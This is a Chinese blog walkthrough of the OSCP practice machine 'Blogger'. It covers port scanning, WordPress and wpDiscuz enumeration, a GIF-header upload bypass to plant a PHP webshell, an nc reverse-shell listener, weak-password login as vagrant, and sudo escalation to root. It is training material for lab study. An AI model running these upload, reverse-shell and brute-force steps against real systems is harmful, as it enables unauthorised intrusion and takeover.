从WEB到内网&&文件上传&&内网弱口令&&sudo提权 ------- 打靶经验分享

OSCP靶机-------Blogger
今天来打一个OSCP的靶机,难度偏高,包含了端口探测,服务探测,ssh弱口令,CMS识别,文件上传绕过,nc反弹shell,sudo提权等等…靶场难度中等偏高,需要收集两个flag,一个flag低权限shell就可以获取,第二个要提权后才可以获取。希望大家看完可以有所收获。

启动环境

启动VPN:openvpn universal.ovpn
在这里插入图片描述
攻击机IP为:192.168.45.181
在这里插入图片描述
目标靶机IP为: 192.168.187.217

信息收集

1.端口
nmap扫描端口
nmap --min-rate 10000 -p- 192.168.187.217
在这里插入图片描述
只有22,80两个端口
22-ssh 80-http
2.端口测试
2.1 22-ssh
手工弱口令登一下试试。
ssh root@192.168.187.217 -p 22
在这里插入图片描述
ssh公钥有问题,无法继续。那么想用hydra爆破也就行不通了。
2.1 80-http
访问192.168.187.217:80
在这里插入图片描述
看上去很精致,应该黑丝有cms,直接查一下。
whatweb http://192.168.187.217:80
在这里插入图片描述
匪夷所思,是blogger么?msf搜一下。
msfconsole
searchsploit Blogger
在这里插入图片描述
没有。换思路,看一下源码:
curl http://192.168.187.217:80
在这里插入图片描述
没什么有用的信息。那就dirsearch扫一下目录。
dirsearch -u http://192.168.187.217
在这里插入图片描述
看一下assets。
访问192.168.187.217:80/assets
在这里插入图片描述
是一个目录遍历。就是这个网站的一些css、js、fonts图标等等。
不过在fonts中有一个blog文件。看上去在记录owasp top10。
在这里插入图片描述
在这里插入图片描述
随便点点,发现会跳转到一个域名blogger.thm。
在这里插入图片描述
看上去要绑定hosts:
vim /etc/hosts
然后在最后加上
192.168.187.217 blogger.thm
在这里插入图片描述
再次访问刚才的blog站点。正常咯。
在这里插入图片描述
看一下cms:
whatweb http://blogger.thm/assets/fonts/blog/
在这里插入图片描述
cms是WordPress 4.9.8,搜一下exp看看。
msfconsole
searchsploit WordPress 4.9.8
在这里插入图片描述
全是插件,也没有rce,wp老漏洞大户了,肯定有专门的wp扫描:wpscan
kali里就有,直接用:
wpscan --url http://blogger.thm/assets/fonts/blog/
在这里插入图片描述
出洞了,http://blogger.thm/assets/fonts/blog/wp-content/uploads/有文件上传。
在这里插入图片描述
还是文件遍历,找不到什么随便点点。发现一个php
在这里插入图片描述
在这里插入图片描述
点进去发现了gif的文件头。应该网站里是有一个上传图片的地方。慢慢找一下。在wp的页面,owasp top10中有上传图片的地方。在这里插入图片描述
这应该是wordpress的组件,源代码定位一下。
在这里插入图片描述
调用的wpdiscuz的组件,抓一下网络的包。
在这里插入图片描述
现在确认了版本信息:wpdiscuz 7.0.4
msf搜索exp
msfconsole
searchsploit wpdiscuz 7.0.4
在这里插入图片描述
search wpdiscuz 7.0.1
在这里插入图片描述
use 0
show options
在这里插入图片描述
set lhost 192.168.45.181
set rhosts 192.168.187.217
set blogpath /assets/fonts/blog/?p=29
run
在这里插入图片描述
失败。。。。回去试试手工文件上传。
经过测试只能上传gif文件,先制作一个图片马。
copy 1.jpg/a +shell.php/b shell.jpg
1.jpg为正常的图片,尽可能选择小点的图片,shell.php 为 php一句话木马。
准备上传,打开burpsuite,抓包改一下文件头看能否上传。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可以看到上传的位置,直接蚁剑链接。
在这里插入图片描述
在这里插入图片描述
有shell了!

内网渗透

利用python获取交互shell
python -c "import pty;pty.spawn('/bin/bash')";
获取flag:
find / -name local.txt 2>/dev/null
cat /home/james/local.txt
在这里插入图片描述

提权

1.sudo提权
sudo -l
在这里插入图片描述
2.suid提权
find / -perm -u=s -type f 2>/dev/null
在这里插入图片描述
没合适的。
3.suid-getcap提权
/usr/sbin/getcap -r / 2>/dev/null
在这里插入图片描述
4.Cron job提权
cat /etc/crontab
查找定时任务。
在这里插入图片描述
5.内核overlayfs提权
lsb_release -a 看看发行版本
在这里插入图片描述
Ubuntu 16.04.7 LTS 符合
uname -a看看内核版本
在这里插入图片描述
内核版本 4.4.0-206 不符合

内网信息收集

看一下用户:
ls -al /home
在这里插入图片描述
看一下是否有隐藏文件
ls -al /home/james
在这里插入图片描述
内网用户密码弱口令爆破,vagrant/vagrant成功了
在这里插入图片描述
但蚁剑好像不太对劲。
这蚁剑的一句话shell就不太行啊,重新拿shell。用kali的webshell:
cp一个出来
sudo cp /usr/share/webshells/php/php-reverse-shell.php exp
在这里插入图片描述

改后缀。
cp php-reverse-shell.php ./shell.jpg
修改监听ip和端口:
vim php-reverse-shell.php
在这里插入图片描述
nc开启监听:
nc -lvvp 1234
在这里插入图片描述
上传该文件,burpsuite抓包修改GIF89a头。
在这里插入图片描述

访问地址之后成功getwebshell
在这里插入图片描述

二次提权

重复之前的操作,vagrant弱口令登录。
1.sudo提权
在这里插入图片描述
存在(ALL) NOPASSWD: ALL
su提权
sudo su
在这里插入图片描述
成功提权
获取flag2:cat /root/proof.txt
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值